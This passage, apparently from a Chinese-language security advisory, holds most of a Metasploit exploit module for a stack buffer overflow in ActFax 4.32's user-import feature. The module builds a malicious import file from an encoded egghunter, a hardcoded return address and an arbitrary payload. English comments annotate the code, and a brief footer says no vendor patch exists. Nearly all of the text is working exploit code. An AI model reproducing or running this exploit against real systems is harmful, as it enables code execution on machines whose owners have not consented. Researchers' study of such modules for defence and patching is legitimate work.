ActFax 'Import Users from File'函数远程栈缓冲区溢出漏洞(2)

'Targets'        =>
                [
                    [ 'ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1',
                        {
                            'Ret'      => 0x00401b22, # ret from ActFax.exe]
                            'Offset'  => 512
                        }
                    ]
                ],
            'Privileged'     => true,
            'DisclosureDate' => 'Aug 28 2012',
            'DefaultTarget'     => 0))

register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.exp']),], self.class)

end

# Builds the crafted user-import file and writes it out via file_create.
#
# The generated file has two rows: a tab-separated header whose column names
# mirror the ActFax "Import Users from File" format, and a single data row
# that is the attack buffer assembled below. Everything else this method uses
# (payload, target, platform, framework, rand_text, generate_egghunter,
# file_create) is supplied by the Metasploit module mixins, not by this file.
def exploit

# These badchars apply only to the egghunter stub and the random filler; they
# do not apply to the final payload, which is carried inside the egg instead.
# Excluded: 0x00..0x20 (control characters and space) and 0x7c ('|').
        badchars = (0x00..0x20).to_a.pack("C*") + "\x7c"

# Egghunter options: enable the checksum variant and tag the egg with 'w00t'.
eggoptions =
            {
                :checksum => true,
                :eggtag => 'w00t'
            }

# hunter: the small search stub; egg: the tagged block holding payload.encoded.
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

# Re-encode the hunter with x86/alpha_upper so it avoids the badchars above.
# BufferRegister is pointed at ESP for the alpha encoder (presumably so its
# decoder stub can locate its own start — confirm against the encoder docs).
# Note the loop reassigns `hunter` with the encoded result on each pass.
[ 'x86/alpha_upper'].each { |name|
            enc = framework.encoders.create(name)
            if name =~/alpha/
                enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
            end
            hunter = enc.encode(hunter, nil, nil, platform)
        }

# Attack buffer layout:
#   19 x `add esp, 0x7f` and one `add esp, 0x23` (stack-pointer adjustment),
#   the encoded hunter, random filler up to target['Offset'] bytes total,
#   target.ret as a little-endian DWORD, then the egg.
# The original inline comment on the first line said 0xff, but the encoded
# immediate byte is 0x7f; the opcode bytes are what actually run.
# NOTE(review): rand_text would receive a negative length if the prelude plus
# the encoded hunter ever exceeded target['Offset'] — no guard exists here.
buffer = "\x83\xC4\x7f" * 19 # add esp, byte 0x7f
        buffer << "\x83\xC4\x23" # add esp, byte 0x23
        buffer << hunter
        buffer << rand_text(target['Offset'] - buffer.length, badchars)
        buffer << [target.ret].pack("V")
        buffer << egg

# Header row: the ActFax user-import column names, tab-separated, CRLF-terminated.
file =  "User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\t"
        file << "Predefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\t"
        file << "Coverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\t"
        file << "Printer Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\t"
        file << "Email Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\t"
        file << "Export Incoming\tExport-Path\tMark as Read\r\n"
# Data row: the buffer above is the first (and only) user record.
        file << buffer
        file << "\r\n"

# file_create (file-format mixin) writes the result under the FILENAME option.
file_create(file)

end
end

建议:
--------------------------------------------------------------------------------
厂商补丁:

ActFax
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
